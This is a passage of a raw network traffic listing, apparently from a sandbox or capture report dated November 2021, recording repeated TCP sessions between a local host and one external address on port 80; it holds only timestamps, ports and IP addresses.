                                              Nov 25, 2021 10:55:13.141045094 CET8050688176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.157313108 CET8050688176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.157371998 CET8050688176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.157536030 CET5068880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:13.157593966 CET5068880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:13.190913916 CET8050688176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.552615881 CET5068980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:13.586752892 CET8050689176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.587059975 CET5068980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:13.588603973 CET5068980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:13.622591019 CET8050689176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.622864008 CET5068980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:13.656934977 CET8050689176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.673353910 CET8050689176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.673415899 CET8050689176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:13.673562050 CET5068980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:13.673635960 CET5068980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:13.707803011 CET8050689176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.066472054 CET5069080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.099929094 CET8050690176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.100171089 CET5069080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.101732016 CET5069080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.135240078 CET8050690176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.135425091 CET5069080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.169003010 CET8050690176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.191421986 CET8050690176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.191484928 CET8050690176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.191776037 CET5069080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.191874027 CET5069080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.225563049 CET8050690176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.583476067 CET5069180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.617610931 CET8050691176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.617819071 CET5069180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.619405031 CET5069180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.653106928 CET8050691176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.653337955 CET5069180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.687180042 CET8050691176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.703444958 CET8050691176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.703501940 CET8050691176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:14.703787088 CET5069180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.703870058 CET5069180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:14.738212109 CET8050691176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.084052086 CET5069280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.117501020 CET8050692176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.117840052 CET5069280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.119360924 CET5069280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.152729988 CET8050692176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.152946949 CET5069280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.186196089 CET8050692176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.205034971 CET8050692176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.205111027 CET8050692176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.205271006 CET5069280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.205315113 CET5069280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.238689899 CET8050692176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.571502924 CET5069380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.605411053 CET8050693176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.605634928 CET5069380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.607177973 CET5069380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.641103983 CET8050693176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.641587973 CET5069380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.675570011 CET8050693176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.692130089 CET8050693176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.692212105 CET8050693176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:15.692413092 CET5069380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.692471981 CET5069380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:15.726486921 CET8050693176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.069888115 CET5069480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.103948116 CET8050694176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.104094982 CET5069480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.105694056 CET5069480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.139641047 CET8050694176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.140073061 CET5069480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.174060106 CET8050694176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.196391106 CET8050694176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.196439028 CET8050694176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.196588993 CET5069480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.196635008 CET5069480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.230973959 CET8050694176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.588460922 CET5069580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.621784925 CET8050695176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.622066975 CET5069580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.623550892 CET5069580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.656970024 CET8050695176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.657157898 CET5069580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.690619946 CET8050695176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.709078074 CET8050695176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.709134102 CET8050695176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:16.709275961 CET5069580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.709330082 CET5069580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:16.742953062 CET8050695176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.096316099 CET5069680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.129796982 CET8050696176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.130110979 CET5069680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.136322021 CET5069680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.169620991 CET8050696176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.169868946 CET5069680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.203555107 CET8050696176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.227396965 CET8050696176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.227461100 CET8050696176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.227617979 CET5069680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.227684021 CET5069680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.261306047 CET8050696176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.625133991 CET5069780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.659346104 CET8050697176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.659574986 CET5069780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.661093950 CET5069780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.695080996 CET8050697176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.695328951 CET5069780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.729376078 CET8050697176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.746172905 CET8050697176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.746221066 CET8050697176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:17.746392965 CET5069780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.746440887 CET5069780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:17.780703068 CET8050697176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.132131100 CET5069880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.165339947 CET8050698176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.165525913 CET5069880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.167114019 CET5069880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.200758934 CET8050698176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.201083899 CET5069880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.234679937 CET8050698176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.251601934 CET8050698176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.251666069 CET8050698176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.251818895 CET5069880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.251883984 CET5069880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.285598040 CET8050698176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.614609003 CET5069980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.648042917 CET8050699176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.648288012 CET5069980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.649872065 CET5069980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.683064938 CET8050699176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.683384895 CET5069980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.716500998 CET8050699176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.732243061 CET8050699176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.732295036 CET8050699176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:18.732686996 CET5069980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.732743979 CET5069980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:18.766129017 CET8050699176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.066078901 CET5070080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.100003958 CET8050700176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.100178003 CET5070080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.101720095 CET5070080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.135621071 CET8050700176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.135749102 CET5070080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.169655085 CET8050700176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.201625109 CET8050700176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.201643944 CET8050700176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.201841116 CET5070080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.201894045 CET5070080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.235817909 CET8050700176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.591883898 CET5070180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.625689030 CET8050701176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.625886917 CET5070180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.627458096 CET5070180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.661012888 CET8050701176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.661326885 CET5070180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.694920063 CET8050701176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.716433048 CET8050701176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.716481924 CET8050701176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:19.716665030 CET5070180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.716720104 CET5070180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:19.750180960 CET8050701176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.102263927 CET5070280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.136385918 CET8050702176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.136595964 CET5070280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.138106108 CET5070280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.172246933 CET8050702176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.172432899 CET5070280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.206581116 CET8050702176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.223124027 CET8050702176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.223189116 CET8050702176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.223481894 CET5070280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.223579884 CET5070280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.257529974 CET8050702176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.596920967 CET5070380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.631042957 CET8050703176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.631268978 CET5070380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.632791042 CET5070380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.666830063 CET8050703176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.667056084 CET5070380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.701256990 CET8050703176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.720868111 CET8050703176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.720931053 CET8050703176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:20.721084118 CET5070380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.721149921 CET5070380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:20.755280018 CET8050703176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.111179113 CET5070480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.144573927 CET8050704176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.144778967 CET5070480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.146266937 CET5070480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.179616928 CET8050704176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.179838896 CET5070480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.213298082 CET8050704176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.229245901 CET8050704176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.229305029 CET8050704176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.229513884 CET5070480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.229571104 CET5070480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.263015985 CET8050704176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.627099991 CET5070580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.661176920 CET8050705176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.661537886 CET5070580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.663105965 CET5070580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.697112083 CET8050705176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.697355986 CET5070580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.731345892 CET8050705176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.747150898 CET8050705176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.747200966 CET8050705176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:21.747342110 CET5070580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.747390032 CET5070580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:21.781456947 CET8050705176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.144752026 CET5070680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.178785086 CET8050706176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.179075003 CET5070680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.180632114 CET5070680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.214845896 CET8050706176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.215109110 CET5070680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.249250889 CET8050706176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.267002106 CET8050706176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.267066002 CET8050706176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.267251968 CET5070680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.267316103 CET5070680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.301474094 CET8050706176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.654889107 CET5070780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.688319921 CET8050707176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.688576937 CET5070780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.690104961 CET5070780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.723354101 CET8050707176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.723547935 CET5070780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.757018089 CET8050707176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.777199030 CET8050707176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.777254105 CET8050707176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:22.777534962 CET5070780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.777645111 CET5070780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:22.811311007 CET8050707176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.172843933 CET5070880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.206995010 CET8050708176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.207228899 CET5070880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.208795071 CET5070880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.242760897 CET8050708176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.242975950 CET5070880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.277419090 CET8050708176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.298696995 CET8050708176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.298747063 CET8050708176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.298943043 CET5070880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.298991919 CET5070880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.332917929 CET8050708176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.678098917 CET5070980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.711587906 CET8050709176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.711802006 CET5070980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.713367939 CET5070980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.746685982 CET8050709176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.746927977 CET5070980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.780284882 CET8050709176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.799150944 CET8050709176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.799225092 CET8050709176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:23.799411058 CET5070980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.799469948 CET5070980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:23.833102942 CET8050709176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.181188107 CET5071080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.214543104 CET8050710176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.214730978 CET5071080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.216252089 CET5071080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.249550104 CET8050710176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.249738932 CET5071080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.283083916 CET8050710176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.304250956 CET8050710176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.304310083 CET8050710176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.304653883 CET5071080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.304704905 CET5071080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.338063002 CET8050710176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.683752060 CET5071180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.717892885 CET8050711176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.718044043 CET5071180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.719605923 CET5071180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.753602028 CET8050711176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.753768921 CET5071180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.787921906 CET8050711176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.807768106 CET8050711176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.807837963 CET8050711176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:24.807996035 CET5071180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.808048010 CET5071180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:24.842051983 CET8050711176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.199342966 CET5071280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.233417988 CET8050712176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.233630896 CET5071280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.235141039 CET5071280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.269093990 CET8050712176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.269308090 CET5071280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.303248882 CET8050712176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.319226980 CET8050712176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.319276094 CET8050712176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.319417953 CET5071280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.319468021 CET5071280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.353719950 CET8050712176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.723814011 CET5071380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.757324934 CET8050713176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.757510900 CET5071380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.759053946 CET5071380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.792386055 CET8050713176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.792563915 CET5071380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.825901985 CET8050713176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.841828108 CET8050713176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.841876984 CET8050713176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:25.842012882 CET5071380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.842061043 CET5071380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:25.875585079 CET8050713176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.241925001 CET5071480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.276082993 CET8050714176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.276299000 CET5071480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.277776003 CET5071480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.311835051 CET8050714176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.312141895 CET5071480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.346461058 CET8050714176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.363966942 CET8050714176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.364020109 CET8050714176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.364188910 CET5071480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.364240885 CET5071480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.398556948 CET8050714176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.737817049 CET5071580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.771933079 CET8050715176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.772135973 CET5071580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.773686886 CET5071580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.807709932 CET8050715176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.807885885 CET5071580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.841883898 CET8050715176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.857871056 CET8050715176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.857919931 CET8050715176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:26.858088017 CET5071580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.858141899 CET5071580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:26.892313957 CET8050715176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.227123976 CET5071680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.260524988 CET8050716176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.260842085 CET5071680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.262392044 CET5071680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.295706034 CET8050716176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.295998096 CET5071680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.329390049 CET8050716176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.345201969 CET8050716176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.345266104 CET8050716176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.345402002 CET5071680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.345453978 CET5071680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.378853083 CET8050716176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.740997076 CET5071780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.775051117 CET8050717176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.775461912 CET5071780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.777040958 CET5071780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.811028957 CET8050717176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.811363935 CET5071780192.168.11.20176.223.209.128
